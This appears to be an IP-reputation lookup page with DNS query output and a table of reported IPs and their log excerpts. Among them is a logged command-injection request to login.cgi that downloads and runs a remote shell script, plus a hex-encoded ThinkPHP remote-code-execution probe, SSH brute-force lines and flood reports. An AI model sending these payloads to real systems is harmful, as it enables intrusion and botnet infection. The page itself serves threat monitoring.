City: unknown
Region: unknown
Country: unknown
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 138.36.225.20
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50918
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;138.36.225.20. IN A
;; AUTHORITY SECTION:
. 6 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022030803 1800 900 604800 86400
;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Mar 09 07:49:19 CST 2022
;; MSG SIZE rcvd: 106
Host 20.225.36.138.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 20.225.36.138.in-addr.arpa: NXDOMAIN
IP | Type | Details | Datetime |
---|---|---|---|
106.12.95.181 | attack | 106.12.95.181 - - [06/May/2019:21:10:47 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 182 "-" "Hakai/2.0" |
2019-05-06 21:11:47 |
134.175.123.16 | attack | May 21 01:42:33 s64-1 sshd[7561]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.175.123.16 May 21 01:42:35 s64-1 sshd[7561]: Failed password for invalid user postgres from 134.175.123.16 port 33900 ssh2 May 21 01:49:41 s64-1 sshd[7674]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.175.123.16 |
2019-05-21 10:06:46 |
101.249.227.246 | bots | 124.235.138.144 - - [23/May/2019:12:41:36 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:36 +0800] "GET /favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:37 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 101.249.227.246 - - [23/May/2019:12:41:38 +0800] "GET /home/favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 101.249.227.246 - - [23/May/2019:12:41:39 +0800] "GET /home/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" 124.235.138.144 - - [23/May/2019:12:41:42 +0800] "GET /home/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" |
2019-05-23 13:08:05 |
159.69.190.90 | attackproxynormal | 2048 |
2019-05-11 10:21:37 |
198.20.87.98 | bots | 198.20.87.98 - - [20/May/2019:11:39:58 +0800] "GET /robots.txt HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:39:59 +0800] "GET /sitemap.xml HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:40:00 +0800] "GET /.well-known/security.txt HTTP/1.1" 301 194 "-" "-" 198.20.87.98 - - [20/May/2019:11:40:00 +0800] "GET /favicon.ico HTTP/1.1" 301 194 "-" "python-requests/2.10.0" 198.20.87.98 - - [20/May/2019:11:40:01 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.10.0" |
2019-05-20 11:45:29 |
54.221.53.134 | spambots | 利用ua字段进行推广的嫌疑 54.221.53.134 - - [15/May/2019:14:13:22 +0800] "GET /check-ip/190.81.186.114 HTTP/1.1" 200 10363 "-" "Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)" 34.207.74.88 - - [15/May/2019:14:13:23 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Slackbot 1.0 (+https://api.slack.com/robots)" |
2019-05-15 14:16:00 |
24.201.166.21 | bots | 24.201.166.21 - - [07/May/2019:07:15:41 +0800] "GET /check-ip/173.177.76.171 HTTP/1.1" 200 10814 "-" "Mozilla/5.0 (X11; NetBSD amd64; rv:16.0) Gecko/20121102 Firefox/16.0" 24.201.166.21 - - [07/May/2019:07:15:48 +0800] "GET /check-ip/173.177.76.171 HTTP/1.1" 200 10171 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5" 24.201.166.21 - - [07/May/2019:07:15:55 +0800] "GET /check-ip/173.177.76.171 HTTP/1.1" 200 10537 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de-AT; rv:1.9.1.8) Gecko/20100625 Firefox/3.6.6" |
2019-05-07 07:17:00 |
212.64.58.150 | botsattack | 212.64.58.150 - - [06/May/2019:16:15:10 +0800] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%\\x80\\x96\\x98 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" 212.64.58.150 - - [06/May/2019:16:15:13 +0800] "GET /lang.php?f=1 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0" |
2019-05-06 16:18:16 |
104.152.52.74 | botsattack | 104.152.52.74 - - [13/May/2019:16:52:17 +0800] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 404 232 "-" "-" 104.152.52.74 - - [13/May/2019:16:52:18 +0800] "\\x01default" 400 182 "-" "-" 104.152.52.74 - - [13/May/2019:16:52:19 +0800] "0\\x0C\\x02\\x01\\x01`\\x07\\x02\\x01\\x02\\x04\\x00\\x80\\x00" 400 182 "-" "-" 104.152.52.74 - - [13/May/2019:16:52:20 +0800] "OPTIONS sip:nm SIP/2.0" 400 182 "-" "-" 104.152.52.74 - - [13/May/2019:16:52:21 +0800] "TNMP\\x04\\x00\\x00\\x00TNME\\x00\\x00\\x04\\x00" 400 182 "-" "-" |
2019-05-13 16:53:29 |
154.73.11.16 | botsattack | 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/66.102.7.131 HTTP/1.1" 200 10208 "https://ipinfo.asytech.cn/" "Scope (Mars+)" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/54.221.53.134 HTTP/1.1" 200 10843 "https://ipinfo.asytech.cn/" "AmigaVoyager/3.4.4 (MorphOS/PPC native)" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/52.4.236.226 HTTP/1.1" 200 10342 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/47.76.186.208 HTTP/1.1" 200 10118 "https://ipinfo.asytech.cn/" "UPG1 UP/4.0 (compatible; Blazer 1.0)" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/98.152.56.135 HTTP/1.1" 200 9694 "https://ipinfo.asytech.cn/" "Lynx/2.6 libwww-FM/2.14" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/38.164.28.153 HTTP/1.1" 200 10459 "https://ipinfo.asytech.cn/" "SBL-BOT (http://sbl.net)" 154.73.11.16 - - [19/May/2019:11:34:33 +0800] "GET /check-ip/38.143.68.212 HTTP/1.1" 200 10732 "https://ipinfo.asytech.cn/" "West Wind Internet Protocols 4.xx" |
2019-05-20 09:15:30 |
159.89.201.212 | botsattack | UDP flood port:0 port:53413 |
2019-05-10 13:19:04 |
178.62.237.197 | spambotsattack | UDP port:51331 ddos attack |
2019-05-05 21:59:12 |
84.38.132.58 | bots | bing/yahoo爬虫 84.38.132.58 - - [09/May/2019:12:24:01 +0800] "GET /check-ip/52.91.66.205 HTTP/1.1" 200 10869 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 84.38.132.58 - - [09/May/2019:12:24:07 +0800] "GET /check-ip/170.79.91.46 HTTP/1.1" 200 11582 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 84.38.132.58 - - [09/May/2019:12:24:12 +0800] "GET /check-ip/13.68.231.137 HTTP/1.1" 200 10854 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 84.38.132.58 - - [09/May/2019:12:24:16 +0800] "GET /check-ip/104.194.24.222 HTTP/1.1" 200 10862 "https://ipinfo.asytech.cn" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" |
2019-05-09 12:24:54 |
94.23.145.174 | botsattack | 94.23.145.174 - - [15/May/2019:22:07:23 +0800] "GET /bitrix/admin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" 94.23.145.174 - - [15/May/2019:22:07:35 +0800] "GET /admin/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" 94.23.145.174 - - [15/May/2019:22:07:37 +0800] "GET /user/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" |
2019-05-15 22:08:53 |
174.138.9.42 | botsattack | UDP flood port:53329 to port: 53329 |
2019-05-08 07:46:52 |